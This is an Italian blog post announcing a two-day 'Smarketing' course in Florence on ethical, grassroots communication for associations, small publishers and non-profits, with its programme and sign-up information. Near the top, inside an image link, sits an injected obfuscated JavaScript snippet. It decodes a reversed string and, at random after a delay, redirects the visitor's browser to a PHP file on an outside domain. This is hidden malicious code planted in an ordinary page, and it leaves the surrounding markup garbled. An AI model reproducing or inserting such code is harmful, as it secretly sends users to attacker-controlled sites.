13 dicembre 2018

Arriva a Firenze lo Smarketing! Per una comunicazione virtuosa dal basso: il 22 e 23 maggio

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/smarketing.jpeg”>Un esempio di "smarketing"
Un esempio di "smarketing"

La comunicazione virtuosa per promuovere associazioni, eventi, gruppi musicali, piccoli editori…
Tutte le informazioni per partecipare sul sito http://corsi.smarketing.it/. I costi? da 75 euro in su.


Se usi la parola target, non c’è verso, cominci a ragionare come un cecchino.

Il week-end di Smarketing, organizzato a Firenze per il 22 e 23 maggio, è  un breve corso di sopravvivenza per aiutare le formiche a farsi vedere, senza farsi fagocitare dai meccanismi della pubblicità dei dinosauri. Chi  sceglie valori come la prossimità, la scala artigianale, la qualità, l’ambiente, la salute, il rispetto dei lavoratori, l’alleanza col cliente… non ha soldi da buttare via in quella macchina bugiarda e mangiasoldi che è il grande sistema pubblicitario, deve spendere molto meno e molto meglio.

Un pubblicitario disertore, Marco Geronimi Stoll, un gruppo di stilisti molto atipici [noti con il brand Serpica Naro], e le realtà fiorentine Altracittà – giornale della periferia, Agenzia di base, perUnaltracittà – lista di cittadinanza e Agenzia Metamorfosi propongono una due giorni attraverso la quale imparare come autoprodursi una comunicazione diversa. Aziende, organizzazioni sociali, piccole imprese che si occupano di altra economia e decrescita, ma anche editori, associazioni culturali e singoli interessati a partecipare al corso possono leggere altre informazioni sul sito http://corsi.smarketing.it/


Il programma completo è qui. E’ possibile leggere i profili dei docenti e quello che altri dicono del corso. Qui le iscrizioni.



Se hai una bicicletta e devi gareggiare con una Ferrari

la soluzione non è pedalare più forte
seguendo la sua stessa strada.
Meglio inventare ogni stratagemma per modificare il percorso
e portarla lungo vicoli e viottoli dissestati
dove più romba, più urla la sua impotenza.

SMARKETING – http://corsi.smarketing.it/
Maratona intensiva di due giorni per imparare a comunicare ecologicamente


Per chi è il corso
– Per i comunicatori interni di aziende profit che abbiano particolari valori di tipicità, etica, tutela dell’ambiente, missione sociale; aziende no profit di qualsiasi tipo, meglio se piccole e poco potenti; associazioni; enti pubblici; piccoli editori, emittenti radiofoniche e televisive; gruppi teatrali o musicali, videomaker, produttori culturali; associazioni anche informali con scopi culturali, artistici o di divulgazione scientifica.
– Per i lavoratori nei vari settori del marketing tradizionale, che cominciano ad aver dubbi sull’etica del loro mestiere e stanno scoprendo che c’è una relazione tra scarso senso della pubblicità e scarso senso della propria vita creativa.

Per chi non è il corso
Chi si aspetta un normale corso di marketing (dedicato a vendere la massima quantità possibile di un qualsiasi prodotto in un’ottica consumista), è meglio che non si iscriva, perché resterebbe deluso.

Come si svolge il corso
Il corso è essenzialmente pratico, con premesse teoriche esposte all’inizio e riassunte alla fine.
Il gruppo si troverà a simulare situazioni reali in cui sarà accompagnato a scegliere soluzioni etiche, economiche e a basso impatto ambientale.
Per permettere agli allievi di ridurre tempo, spesa e spostamenti occorre sfruttare al massimo il corso, per questo lo organizziamo in forma intensiva; quindi è indispensabile un’atmosfera creativa e di affiatamento, ludica ma concentrata; per questo si favorirà un clima conviviale.

Scopi del corso

Ovviamente lo scopo principale è apprendere i contenuti le tecniche e le pratiche dello smarketing; ma questo non è l’unico scopo importante; vogliamo anche creare in ciascuna città un nucleo di persone in rete che lo mettano in pratica e che si rinforzino reciprocamente.

Per iscriversi

Chi aspira ad essere allievo si iscriva qui.

0 Comments

  1. Pingback: Arriva a Firenze lo Smarketing! Per una comunicazione virtuosa dal basso: il 22 e 23 maggio « ACF Toscana

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *